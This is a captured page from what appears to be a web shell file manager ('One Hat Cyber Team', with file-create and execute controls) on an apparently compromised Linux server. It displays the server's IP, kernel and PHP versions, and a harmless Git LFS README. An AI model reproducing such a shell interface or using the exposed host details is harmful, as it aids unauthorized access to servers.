⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.93
Server IP:
65.108.141.171
Server:
Linux server.heloix.com 5.4.0-214-generic #234-Ubuntu SMP Fri Mar 14 23:50:27 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
git-lfs
/
View File Name :
README.md
# Git LFS Documentation ## Reference Manual Each Git LFS subcommand is documented in the [official man pages](man). Any of these can also be viewed from the command line: ```bash $ git lfs help <command> $ git lfs <command> -h ``` ## Videos * [How to Work with Big Files](https://www.youtube.com/watch?v=uLR1RNqJ1Mw) - Quick intro to Git LFS. ## Developer Docs Details of how the Git LFS **client** works are in the [official specification](spec.md). Details of how the GIT LFS **server** works are in the [API specification](api).